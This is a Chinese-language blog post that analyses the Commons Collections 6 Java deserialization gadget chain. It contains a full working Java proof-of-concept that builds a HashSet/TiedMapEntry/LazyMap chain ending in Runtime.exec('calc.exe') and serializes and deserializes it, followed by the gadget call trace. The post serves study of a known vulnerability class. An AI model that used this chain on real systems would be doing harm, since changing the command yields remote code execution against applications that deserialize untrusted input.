Commons Collections 6

阅读数:10

序言

环境要求:CommonsCollections: 3.1-3.21 , java版本暂无要求

CommonsCollections6是上一个CC5的改动版。

CC6链中使用的是HashSet去触发LazyMap的get方法。而在CC5中使用的是BadAttributeValueExpException

分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
package CC6;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.collections.keyvalue.TiedMapEntry;

import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;
import java.util.Set;

public class test {

    public static void main(String[] args) throws ClassNotFoundException, NoSuchFieldException, IllegalAccessException {
        //构造ChainedTransformer链
        Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[] {String.class, Class[].class }, new Object[] {"getRuntime", new Class[0] }),
                new InvokerTransformer("invoke", new Class[] {Object.class, Object[].class }, new Object[] {null, new Object[0] }),
                new InvokerTransformer("exec", new Class[] {String.class }, new Object[] {"calc.exe"})
        };
        Transformer chain = new ChainedTransformer(transformers);

        HashMap innermap = new HashMap();
        LazyMap map = (LazyMap)LazyMap.decorate(innermap,chain);

        TiedMapEntry tiedmap = new TiedMapEntry(map,123);

        HashSet hashset = new HashSet(1);
        hashset.add("Teabo");

        //map.remove("123");

        //设置map属性为HashMap
        Field field = Class.forName("java.util.HashSet").getDeclaredField("map");
        field.setAccessible(true);
        HashMap hashset_map = (HashMap) field.get(hashset);

        //修改key为hashset
        Field table = Class.forName("java.util.HashMap").getDeclaredField("table");
        table.setAccessible(true);
        Object[] array = (Object[])table.get(hashset_map);

        Object node = array[0];
        if(node == null){
            node = array[1];
        }

        Field key = node.getClass().getDeclaredField("key");
        key.setAccessible(true);
        key.set(node,tiedmap);
        //
        try{

            //序列化
            ObjectOutputStream outputStream = new ObjectOutputStream(new FileOutputStream("./cc61.bin"));
            outputStream.writeObject(hashset);
            outputStream.close();
            //反序列化
            ObjectInputStream inputStream = new ObjectInputStream(new FileInputStream("./cc61.bin"));
            inputStream.readObject();
        }catch(Exception e){
            e.printStackTrace();
        }
    }
}

利用链:

1
2
3
4
5
6
7
8
9
Gadget chain:
        java.io.ObjectInputStream.readObject()
            java.util.HashSet.readObject()
                java.util.HashMap.put()
                java.util.HashMap.hash()                    org.apache.commons.collections.keyvalue.TiedMapEntry.hashCode()                    org.apache.commons.collections.keyvalue.TiedMapEntry.getValue()
                        org.apache.commons.collections.map.LazyMap.get()          org.apache.commons.collections.functors.ChainedTransformer.transform()
                            ...                            org.apache.commons.collections.functors.InvokerTransformer.transform()
                            java.lang.reflect.Method.invoke()
                                java.lang.Runtime.exec()

在上一节讲过TiedMapEntry中的getValue()可以触发get()方法,CC5是用toString()来调用getValue(),这里我们换一个,用hashcode()

image-20210804150555246

那么就来找找什么地方能调用TiedMapEntry#hashcode()

HashMap找到hash函数,里面调用自己的hashcode()

image-20210804150702211

image-20210804150716903

分析过URLDNS链就应该很眼熟了,如果能控制这个key为TiedMapEntry就能连起来了

正好HashSet#readObject()完美符合条件

image-20210804150755641

e的结果为s的readObject(),看看它序列化writeObject()

image-20210804150829863

如果我们能控制map中的Key,就能设置s,那么e也就可控了,HashMap#put的key也可控。

所以我们需要控制传入map的keySet返回结果来控制变量。

再来看看POC的构造

前半部分依然是和CC5一样

image-20210804151306971

但是后半部分多了一些乍一看挺复杂的步骤

image-20210804151430063

第一个红框处主要是利用反射获取我们的 HashSetmap 属性,因为我们要先获取到 map 才能对 map 的 key 进行修改。

第二个红框处则是修改我们 HashMap 中的 key 值为 hashset,在这里利用反射获取了 HashMap 中的 table 属性,table其实就是hashmap的存储底层,将 <Key,Value> 封装在了 Node 对象中,在获取到了 table 中的 key 之后,利用反射修改其为 hashset。

最终的目的只是通过反射修改keySet的返回结果为[TiedMapEntry]而已

简单调试一下

将TiedMapEntry作为e传入hashmap.put()

image-20210804151710007

调用TiedMapEntry#hashcode

image-20210804151745089

调用TiedMapEntry#getValue()

image-20210804151810446

触发LazyMap#get()

image-20210804151830581

后面的事情大家应该都懂。

本站总访问量2281 | 本站访客数1739